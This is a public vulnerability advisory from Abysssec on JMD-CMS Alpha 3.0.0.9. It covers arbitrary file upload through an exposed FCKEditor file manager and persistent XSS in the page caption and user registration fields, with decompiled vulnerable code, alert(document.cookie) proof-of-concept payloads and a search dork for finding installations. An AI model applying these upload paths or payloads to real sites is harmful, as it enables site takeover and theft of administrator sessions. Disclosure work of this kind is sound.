109 lines
No EOL
3.7 KiB
Text
109 lines
No EOL
3.7 KiB
Text
'''
|
|
__ __ ____ _ _ ____
|
|
| \/ |/ __ \ /\ | | | | _ \
|
|
| \ / | | | | / \ | | | | |_) |
|
|
| |\/| | | | |/ /\ \| | | | _ <
|
|
| | | | |__| / ____ \ |__| | |_) |
|
|
|_| |_|\____/_/ \_\____/|____/
|
|
|
|
http://www.exploit-db.com/moaub-19-jmd-cms-multiple-remote-vulnerabilities/
|
|
|
|
'''
|
|
|
|
Abysssec Inc Public Advisory
|
|
|
|
|
|
Title : JMD-CMS Multiple Remote Vulnerabilities
|
|
Affected Version : JMD-CMS Alpha 3.0.0.9
|
|
Discovery : www.abysssec.com
|
|
Vendor : http://www.jmdcms.com/
|
|
|
|
Download Links : http://jmdcms.codeplex.com/releases/view/6674
|
|
|
|
Dork : "powered by jmdcms.com"
|
|
|
|
|
|
Admin Page : http://localhost/jmdcms/Login.aspx
|
|
|
|
|
|
Description :
|
|
===========================================================================================
|
|
This version of JMD-CMS(JMD-CMS Alpha 3.0.0.9) have Multiple Valnerabilities :
|
|
|
|
1- Upload arbitrary file with FCKEditor
|
|
2- Persistent XSS
|
|
|
|
|
|
|
|
1) Upload arbitrary file with FCKEditor:
|
|
===========================================================================================
|
|
|
|
With this vulnerability you can upload any file with this Link:
|
|
|
|
http://localhost/jmdcms/FCKeditor/editor/fckeditor.html
|
|
or http://localhost/jmdcms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.aspx
|
|
|
|
your files will be in this path:
|
|
|
|
http://localhost/UserFiles/Image/
|
|
|
|
|
|
|
|
2) Persistent XSS Vulnerabilities:
|
|
===========================================================================================
|
|
|
|
1-In this path you can see a persistent XSS Valnerability in Caption field:
|
|
(this page is accessible for Admin)
|
|
|
|
http://localhost/jmdcms/addPage.aspx?Parent_Page=default
|
|
|
|
Vulnerable Code:
|
|
In App_Web_25otrp1v.dll ---> Modules_Admin_AddPage Class
|
|
|
|
////////////////////////////////////////////
|
|
public void SavePage(string URI)
|
|
...
|
|
..
|
|
.
|
|
this.Page_Name.Text = this.Page_Name.Text.Replace("~", "-");
|
|
try
|
|
{
|
|
server.JMD_PAGE_SAVE(this.Page_Id.Value, Util.SiteURL(URI), this.Page_Name.Text, this.Page_Caption.Text, this.Meta_Title.Text, this.Meta_Desc.Text, this.Meta_Keywords.Text, this.Parent_Page_Name.Text, str, str2, str3, this.CBLToString(this.View_Roles), this.CBLToString(this.Add_Roles), this.CBLToString(this.Edit_Roles), this.CBLToString(this.Delete_Roles), this.CBLToString(this.Move_Roles), this.CBLToString(this.Add_Module_Roles), "0", str4, this.Page_Sort.Text, str5);
|
|
...
|
|
}
|
|
////////////////////////////////////////////
|
|
|
|
As you can see No Sanitizasion for Value: this.Page_Caption.Text
|
|
For example Caption can be: <script>alert(document.cookie)</script>
|
|
|
|
|
|
2- In Register Page :
|
|
http://localhost/jmdcms/NewUser.aspx
|
|
|
|
Code:
|
|
In App_Web_25otrp1v.dll ---> Modules_Core_NewUser class
|
|
|
|
////////////////////////////////////////////
|
|
public bool SaveUser()
|
|
...
|
|
..
|
|
.
|
|
try
|
|
{
|
|
server.JMD_USER_INSERT(this.User_Id.Value, Util.SiteURL(base.Request.QueryString["Pg"].ToString()), this.User_Name.Text, this.User_Display_Name.Text, str, salt, this.Email.Text);
|
|
...
|
|
}
|
|
////////////////////////////////////////////
|
|
|
|
No Sanitization for Values.
|
|
For Example you can enter this values in Register Page: (This field is limited to 50 Character)
|
|
|
|
UserID = user<script>alert(document.cookie)</script>
|
|
DisplayName = user<script>alert(document.cookie)</script>
|
|
Password = user
|
|
Email = ur@yah.com<script>alert(document.cookie)</script>
|
|
|
|
and when Admin see this page, your script will be run.
|
|
http://localhost/jmdcms/Users.aspx
|
|
|
|
=========================================================================================== |